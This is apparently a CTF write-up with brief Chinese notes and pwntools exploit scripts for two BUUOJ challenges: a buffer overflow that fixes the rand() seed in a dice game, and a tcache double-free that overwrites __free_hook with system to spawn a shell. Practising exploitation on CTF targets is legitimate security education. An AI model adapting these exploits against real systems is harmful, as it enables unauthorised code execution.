qctf_2018_dice_game
溢出,控制seed值,使伪随机为固定值
#include <stdlib.h>
#include <stdio.h>
#define MAX 50
int main( void)
{
int number[MAX] = {0};
int i;
srand(0); /*播种子*/
for(i = 0; i < MAX; i++){
number[i] = rand() % 6;
printf("'%d',", number[i]+1);
}
printf("\n");
return 0;
}
from pwn import*
#r=process('./QCTF_2018_dice_game')
r=remote('node4.buuoj.cn',29426)
r.sendline('a'*0x40+p64(0))
a=['2','5','4','2','6','2','5','1','4','2','3','2','3','2','6','5','1','1','5','5','6','3','4','4','3','3','3','2','2','2','6','1','1','1','6','4','2','5','2','5','4','4','4','6','3','2','3','3','6','1']
for i in range(50):
r.recvuntil('Give me the point(1~6): ')
r.sendline(a[i])
r.interactive()
xm_2019_awd_pwn2
这题限制最多创建18个堆,libc2.27加了doublefree检测的话,用fastbin_attack,就差一个堆就可以做出来,(不知是不是awd,被修过)而buu的远端是老版本没有doublefree检测,用tcache doublefree就可以解出
from pwn import *
from LibcSearcher import *
local_file = './xm_2019_awd_pwn2'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('', )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#---------------------
def add(size,content):
sla('>>','1')
sla('size:',str(size))
sla('content:',content)
def free(index):
sla('>>','2')
sla('idx',str(index))
def show(index):
sla('>>','3')
sla('idx',str(index))
#-------------------
add(0x410,'pppp')#0
add(0x68,'aaaa')#1
free(0)
show(0)
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
libc_base=malloc_hook-libc.sym['__malloc_hook']
print hex(libc_base)
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#------------------------
for i in range(7):
add(0x68,'a'*0x60)#8
add(0x68,'')#9
for i in range(7):
free(i+1)
free(8)
free(9)
free(8)
for i in range(7):
add(0x68,'aaaa')#15
add(0x68,p64(malloc_hook-0x23))#16
add(0x68,'')#17
add(0x68,'')#18
#add(0x68,'失败')#19
debug()
r.interactive()
from pwn import *
from LibcSearcher import *
local_file = './xm_2019_awd_pwn2'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25368 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#---------------------
def add(size,content):
sla('>>','1')
sla('size:',str(size))
sla('content:',content)
def free(index):
sla('>>','2')
sla('idx',str(index))
def show(index):
sla('>>','3')
sla('idx',str(index))
#-------------------
add(0x410,'pppp')#0
add(0x68,'aaaa')#1
free(0)
show(0)
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
libc_base=malloc_hook-libc.sym['__malloc_hook']
print hex(libc_base)
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#------------------------
add(0x10,'')
add(0x10,'/bin/sh\x00')
free(2)
free(2)
add(0x10,p64(free_hook))
add(0x10,'')
add(0x10,p64(system))
free(3)
r.interactive()